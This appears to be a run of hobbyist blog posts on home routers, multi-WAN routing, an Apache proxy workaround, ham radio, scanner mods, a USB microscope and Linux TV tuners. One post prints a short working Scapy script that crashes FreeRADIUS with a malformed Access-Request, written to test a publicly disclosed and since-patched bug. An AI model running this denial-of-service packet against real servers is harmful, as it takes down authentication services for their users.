BrainDeadProjects.com
(A place for low-grade evil)

My friend Mat recently asked how difficult it is to build your own router. He’s living in a house with 4 or 5 other guys, and two Internet connections (one for work purposes, the other apparently comes with the house).

My immediate suggestion was to grab an old Sun Cobalt Raq server. My former router was based off a Qube3 picked up off ebay for less than $80.00. The things are great: low power consumption, two NICs, an LCD screen, a trippy green LED panel….

Fear my awesome green LED

USB, Serial, and 2 ethers

There’s numerous walkthroughs on how to turn these things into mailservers, etc… (google for them). The basic gest of what one needs to do is:

• Upgrade the ROM. This has fixes for 2.6 kernels as well as support to boot from an ext3 filesystem.
• Install the root filesystem on the drive(s). This can be done by mounting the IDE drives in another box, or using an nfs server to install from the Qube itself.
• Compile a kernel. While there are many patches out there, I’ve found that (possibly aside from the LCD screen, which I’ve never bothered with), a vanilla 2.6 kernel will work fine

Nothing that’s too incredibly different from setting up a normal box. I would highly recommend two resources: The first of which is Braggtown, the second one being Tim and Tina Wileys site

As far as items to install: I’m personally using Quagga for static routing  and OSPF (I use the Cobalt as a route server. Also Quagga has a nice Cisco-like CLI), OpenSwan for VPN access, VTUN for quick tunnel here and there (over which I run OSPF), Roaring Penguin L2TP for various layer 2 tunnels, etc, etc..

Iproute2 provides for the ability to properly handle multiple WAN connections via multiple routing tables. There are 255 tables available for routing and  iproute2 makes the use of named tables easy – simply add the numeric value and tablename to /etc/iproute2/rt_tables.

When working with multiple WAN interfaces, I generally setup the second routing table and rules similar to this:

ip route add default via <gateway for this connection> dev <interface> table <tablename>

ip rule add from <WAN IP> table <tablename>

The above simply adds an interface into the table and adds a default gateway. To isolate a machine on the internal LAN to ONLY use the newly defined routing table, one can simply:

ip rule add from 192.168.32.10 table <tablename>

ip rule add to 192.168.32.10 table <tablename>

Depending on your default policy,  you may need to make alterations to your iptables rules as well (especially to support forwarding and NAT masquerading) You can also hook into TOS flags (amongst other things) and route based on port numbers, etc. Basically the sky is the limit (you can do round-robin routing out interfaces, etc)

Next up is IPv6. IPv6 tunnels are easy to come by these days – Hurricane Electric and Sixxs.net are two of the more popular tunnel-brokers, MyBSD is a Malaysian broker I would personally recommend (good for IRC, latency is high, it goes down semi-frequently.. but I like Malaysia).  Also be aware that some brokers block common IRC ports. (Luckily I’m currently testing IPv6 for the ISP I work for and am now working off our /32)

Quagga can handle IPv6 address auto-assignment on your LAN. By default, ipv6 nd suppress-ra is set on most all interfaces. Disable it on the LAN interface, slap an IPv6 address and subnet in that interface config – and voila – your IPv6 router is now handling IPv6 autoconfiguration.

I recently upgraded to using a small form-factor IBM ThinkCentre 8183B2U.

ThinkCenter with a Courier dialup modem and 3 USB drives atop it

The power consumption is also fairly low (I believe), and wanting to do a little more with the router, I figured why not spend another $80. Of course, the downside to the ThinkCentre is having only 1 on-board NIC and 2 PCI slots. In the near future I plan on picking up a quad-port LINKX ethernet card, to consolidate cards (I presently have 2 PCI NICs added to the router for connections to the LAN and a monitoring tap). Hopefully I can find a quad port card that will fit in the small form-factor .

And excuse the mess, I’ve yet to make things “pretty” yet.

My car (nicknamed “The Fish” for it’s fishlike appearance) just celebrated a birthday of sorts.

First of all, the car is a 1999 Ford Taurus SE.. and as you can see in this dealer picture – it has all of the features of an aquatic animal – two bulbous eyes, two smaller “nostril” looking things, sideview mirrors that could possibly be fins, and a mouth where the ford emblem is.

The FISH! (Well, another Fish)

I’ve been working for a while on the possibility of using a WebpadDT as a touchscreen for a car pc. The inside of the Fish is huge – but at 8 inches or so, the WebpadDT takes up a lot of space. On the other hand, it’s quite a bit cheaper than a lilliput screen.

While driving home this weekend, I looked down and noticed an upcoming milestone:

111,108 miles

I got the camera ready – almost at 111,111 miles. Good Old Lucky 111,111 – make a wish!
Well… maybe not. Turns out 111,108 is an unlucky number:

My Brake Light is Out.

My brake light was apparently out. A quick notice from the cop, and I was on my way. Being only about a mile from my house meant I had to drive around the block a few times, but finally I hit it:

111,111 miles

The other day I came across the following scenario: A customer wanted to use Apache proxying to hide the virtual hostname that his customers were really pulling content from. The rewrite rule on the “masking host” (which I refer to as www.proxy.net in these examples) is easy enough:

RewriteRule ^/~(.*)$ http://user.proxiedto.net/~$1 [P]

Which works pretty well:

The problem is what happens when DirectorySlash is enabled on the proxied-to host  (which it is by default). DirectorySlash fixes incorrectly identified resources – as an example, if you request a directory but without the trailing forwardslash.

GET /~gillespiem/images HTTP/1.1
Host: www.proxy.net
…

In this instance, you get a 301 redirect that appends a “/” to the end of the request BUT also sets the Location header to  the proxied-to virtualhostname.  The Jig is up – and now the address bar in the browser indicates the real host the end-user is speaking to :

Here’s a snippet of response from the site:

HTTP/1.1 301 Moved Permanently
Date: Tue, 27 Oct 2009 16:28:27 GMT
Server: Apache/2.2.3 (CentOS)
Location: http://user.proxiedto.net/~gillespiem/images/
…

I’ve not been able to find an easy way to change what DirectorySlash uses in the Location header (maybe you can’t). DirectorySlash is important, so simply not using it won’t work in this application. Instead, I opted to use a RewriteMap to simply write my own version:  DirectorySlashHack and enable it in the vhost container (on the proxy-to site) ala:

DirectorySlash off
RewriteMap directoryslashhack        prg:/etc/httpd/maps/directoryslashhack
RewriteRule ^/~([^/]+)(/?.*)         ${directoryslashhack:%1*$1*$2}

While the solution is hack-ish (and the script and rewriterule could use a small bit of cleanup), it seems to work so far. The perl script determines if the requested resource is a directory, and if so it issues the appropriate 301 redirect using a customizable location header (which allows me to force the cleaned-up request back to the proxy).

I haven’t had a chance to use Scapy in a little while, and I don’t spend hardly any time in Python (don’t really know the language at all, to be honest), but a long time ago I was searching for an IPv6 capable successor to Hping. Scapy almost fits the bill.

Earlier today, while reading through Full Disclosure, I came across something interesting: a Freeradius DoS bug. This piqued my interest as I’m currently experiencing _something_ that’s periodically knocking over radiusd. Furthermore, the radius server in question talks to a router with problematic L2TP tunnels (caused by a software bugs in L2TP sequencing on the Telco router on the other end…their vendor has confirmed the problems)

Time to create the packet of death. Scapy doesn’t appear to have a layer for RadiusAttributes yet, thankfully it IS in their Trac.

So, download the layer to scapy/layers, ensure that it imports the required items:

import struct
from scapy.packet import *
from scapy.fields import *
from scapy.layers.inet import UDP

from scapy.layers.radius import Radius

Add “radiuslib” to the load_layers array in config.py, and we’re ready to go:

#!/usr/bin/env python
# FreeRadius Packet Of Death
# Matthew Gillespie 2009-09-11

import sys
from scapy.all import IP,UDP,send,Radius,RadiusAttr

if len(sys.argv) != 2:
print “Usage: radius_killer.py <radiushost>\n”
sys.exit(1)

PoD=IP(dst=sys.argv[1])/UDP(sport=60422,dport=1812)/ \
Radius(code=1,authenticator=”\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99″,id=180)/ \
RadiusAttr(type=69,value=”",len=2)

send(PoD)

(download)

Interestingly, one doesn’t need a shared key to send the packet of death, as you can tell the authenticator for the Access-Request packet is pulled out of thin air.

I’m assuming that most people iptable off access to their radius servers, so playing whack-a-mole with a provider probably isn’t that do-able. Beyond that, to even come close to possibly exploiting this, you need to be listed in clients.conf – so there’s already that level of trust.  Correct me if I’m wrong. Either way, updated packages are available.

RIP Milw0rm

A couple months back,  I finally took my Amature Radio Technicians exam. The exam location nearest me gave the exam for free, and with only 35 questions it doesn’t involve copius amounts of studying.

After a friend opened my eyes to a few fun things one can do w/ a radio scanner, I went on a “learning tangent”, reading and talking to people w/ Amature licenses, digesting everything that one can do w/ a radio these days.

One of the things that’s interested me the most is APRS. Using Xastir, one can track mobile and static APRS stations in your area.

There’s some interesting stuff out there – in my area there’s a trucker (N6GVG) that I’ve followed, making runs from West Virginia, to Tennesse, to Pennsylvania, and from there to New Jersey. (I’m a HUGE fan of Open Transport Tycoon Deluxe, if you’ve not played it – seriously, get it. I only wish American trains were equiped w/ APRS)

The Extremely fun and addictive OTTD

I’d purchased a Yaesu-VX7R from ebay for just under $290.00.

With the amature license in tow (KB3TCN), I decided I’d start sending out my own beacons. Problem was, I couldn’t figure out how to interface my soundcard (I’m using soundmodem) with the Yaesu. I’d already purchased the CT-91 cable from ebay (it splits out from a 4 tipped 3.5mm plug to a 3.5mm headphone plug and 2.5mm mic input), but simply connecting the soundcard to the mic input (using an adapter) didn’t work (and was probably incredibly stupid to try). Doing so keeps the radio keyed, and I’m sure is bad.

After talking to the gang on freenode:#hamradio and looking at the manual for TNC connection, it turns out the solution is fairly simple – two interfaces utilizing various isolation transformers (see http://www.qsl.net/wm2u/interface.html for a good intro, I’ll post my modified schematics shortly… I actually wrote this post months ago)

The optimal voltage is 5mV with 2kohms of resistance. My circuit gets it pretty close (btw, I can’t take responsibility for any harm this circuit causes, use at your own discretion. Seriously, don’t trust my judgement – this is how I change a car tire).

Anyway, it’s working for me. I had to pump the soundcard output up pretty high, but I’ve got my beacon reportedly seen by others. (It’s been a few weeks since I’ve transmitted, as my next project is to do a PIC based tracker for my car)

Time flies.

It was one year ago that I first read about the “Great Internet Migratory Box of Electronics Junk”. It piqued my interest then, but I never bothered to put myself onthe list…

Box o' Junk

Well, I’ve been working more and more on a small handful of projects, and maybe I can find something useful (I’ve also got plenty of decent stuff to rid myself of). So today, my name is on the list… if I get a box, I’ll let you know what I found (with pics).

(If you’re sending a box, just leave me a private comment and I’ll give you contact information)

Adding a discriminator to the Uniden Bearcat BC80xlt scanner isn’t an incredibly difficult task. BC80xlt discriminator

Simply find pin 9 of the MC3361 chip, connect a 2.2nf capacitor connected to a 10k ohm resister w/ a small piece of wire to go to a 3.5mm headphone jack. The capacitor connects to the radio shield, and that’s about it (I suggest you follow the steps above).

My BC80XLT

My BC80xlt  is slightly different that in the pictures in the link above. In some way, it’s closer to the BC60-xlt-2. The innards of my device include a main board, connected to a daughterboard.  The “down” side of the daughterboard has the chip, the “top” side has the shield.  This requires one to route the discriminator around the daughterboard, avoiding contact with anything accidentally. My soldering job is pathetic (I have no illusions about that). In my defense I am using a rusty tip which doesn’t conduct very well, but beyond that I really have no excuse aside from not being that skillful. My big concern was damage to the MC3361 by heat from the soldering iron. In fact, later I realized I was using a 30wWatt iron – not the specified 15Watt. (D’oh!) Turning it back on yields no apparent difference, so hopefully all is well.

Connection to pin 9

Connection to the shield

Here’s how the two separate parts of my scanner look:

The top and bottom, which connect together

The connection to the 3.5mm jack

The 3.5mm discriminator tap

I had to make a few additional modifications. First of all, I removed the former cap and resistor (seen above),  and replaced it with a much better soldered joint (practiced for a bit prior to doing so). The 3.5mm jack has one problem – when pushed in all the way the male connector actually makes contact with the grounded sheild (that’s bad). The shield doesn’t appear to get hot, so I’ve used a small piece of plastic to prevent that from happening. Now everything fits snug, and this works great.

Well, the bad news is the ant colony I was rearing has died off. I’m unsure what the problem was, but the ant queen was found dead, followed by the only two offspring dying a couple of days later.

I don’t have a decent digital camera that can take decent pictures of something as small as an ant, and I came across an old article detailing an interesting childrens toy: The Intel QX3 microscope.

The QX3 Microscope

It was released about 10 years ago, so I’m obviously behind the times. The resolution isn’t the greatest (the QX3 is a first-gen, but the QX5 has some improvements including better resolution).

The device runs well on linux, you need the following configuration options (in addition to normal USB drivers):

CONFIG_VIDEO_CPIA=m

CONFIG_VIDEO_CPIA_USB=m

The camera (the microscope is basically a webcam) has a number of interesting settings, all touchable via the /proc filesystem:

You can alter any of these settings by doing something like:

echo “bottomlight: on” > /proc/cpia/videoX

(I’ve found that you need to have the camera actively in use for these settings changes to actually work).

Two programs work well with the camera – xawtv and tvtime. TvTime has a few minor issues that I’ve yet to work out, but I’ll figure that out eventually (namely the buffer isn’t filling up properly). XawTV has an issue with screencaptures – again an issue I’ll work out shortly.

For better images, I’ve found that setting sensor_fps to 10 works well. One I have a specimen on the slide and in proper position, I drop that to 3 to actually take the image.

As I mentioned earlier, the resolution isn’t that great.  I’ve been told lighting is the key, and I’m still experimenting. Here’s the head of the queen ant, I’m sure of species:

Queen ant, taken w/ QX3

My old BrookTree Tuner card died recently. I only used it for basic chores – backup of VHS tapes, maybe watching the Deadliest Catch while I worked…

My old generic card (if you want it, pay for shipping and it's yours)

Everyone online is building DTRs using the latest technology, but that’s not how I generally work. Cheap and worthy is about the only qualification I have – and you can pick up a nice Pinnacle PC-TV Pro online for $25.00. (ebay)

The bigger problem is determining the tuner… a difficult task to do when looking at a picture of an item on ebay. When doing research on a BTTV card – I’ve got to recommend http://www.bttv-gallery.de/

Someone thankfully put a lot of research into this site. If you search around, there’s a lot of griping on the internet about “the tuner doesn’t work on so-and-so card”. Using this site, I was able to easily discern different revisions of AcerTV and Pinnacle cards – which is important when you plan on using the card under Linux.

So, here’s my card:

01:07.1 Multimedia controller: Brooktree Corporation Bt878 Audio Capture (rev 11)
Subsystem: Pinnacle Systems Inc. PCTV pro (TV + FM stereo receiver, audio section)
Flags: bus master, medium devsel, latency 64, IRQ 17
Memory at fc0fe000 (32-bit, prefetchable) [size=4K]
Capabilities: [44] Vital Product Data <?>
Capabilities: [4c] Power Management version 2
Kernel driver in use: Bt87x

I’ve found that for sound support, you want to make sure to load the “tuner” module PRIOR to inserting the “bttv” module  (otherwise you’ll end up with no sound). The module options that worked for me were: “bttv card=39″ and “tuner=33″. If you’re looking for a full list of card and tuner numbers, look at the Linux source Documentation/video4linux/CARDLIST*

For viewing, I’m using xawtv and tvtime. I’m still fighting w/ sound issues – one _should_ be able to either set /dev/dsp1 (the bt card on my system) as the audio source – but I’ve yet to get that to work correctly.

One can also use SOX to pipe /dev/dsp1 to /dev/dsp0, but I’m still battling w/ that. I believe the following should work, but have yet to get it to execute w/o throwing errors:

sox -q -c 2 -s -r 32000 -t alsa hw:1 -t alsa -r 32000 hw:0

My current workaround is a simple 3.5mm male/male connector to connect the output of the PCTV Pro to the Aux Input of the onboard soundcard.

Recording from the card is fairly easy, too.  XawTV has an application called “streamer”, but I’m much more inclined to use menconder (part of the mplayer package):

mencoder -oac mp3lame -ovc lavc -lameopts mode=1:vbr=2:q=4 -lavcopts vcodec=mpeg4 -tv driver=v4l:norm=ntsc:channel=3:chanlist=us-cable:adevice=/dev/dsp:width=640:height=480 -af volume=-25 -o /tmp/tv.avi tv://

I’ve just picked up a DT Research WebDT366 Tablet. I’m in need of a good touchscreen for a CarPC project, and the Lilliputs are a little more expensive than I had hoped to go (Appx, $250.00 on Ebay).

First boot (I'm finishing up the Gentoo Linux Image)

The WebDT366 was only $90 (in fairly good condition), and I figured if I didn’t end up using it for a CarPC (or as simply the touchscreen for the CarPC), I could certainly find something else to do w/ it.

tschak909 has already done a good amount of work getting Linux to run on the device. (http://forum.linuxmce.org/index.php?topic=6663.0). Thankfully it’s x86, so life should be a little easier when building custom images.

Wanting to know what packages and configuration Thom has used in his installation, I needed a way to mount the raw disk image (http://www.localeconcept.com/private/webpad-beta2.dd.bz2). Googling didn’t get me at the exact answer, but it got me close enough to figure it out.

First off, use losetup and and offset (flagged by -o).  When running “file” on the image, you’ll see something like this:

lennybruce ~ # file /tmp/webpad-beta2.dd
/tmp/webpad-beta2.dd: x86 boot sector; partition 1: ID=0×83, active, starthead 1, startsector 63, 1023057 sectors

As you can see, partition one starts at sector 63. (512 bytes * 63 = 32256). Having this information, mounting is easy:

lennybruce ~ # losetup -o 32256 /dev/loop0 /tmp/webpad-beta2.dd
lennybruce ~ # mount /dev/loop0 /mnt/loop
lennybruce ~ # ls /mnt/loop/
bin   cdrom  etc   initrd      lib         media  opt   root  selinux  sys   tmp  var
boot  dev    home  initrd.img  lost+found  mnt    proc  sbin  srv      temp  usr  vmlinuz
lennybruce ~ #

That’s it for mounting a raw disk image. Using the information Thom has provided in his image (video driver, input drivers, etc)… I’m building a custom Gentoo image that will hopefully be the basis or front-end of a CarPC.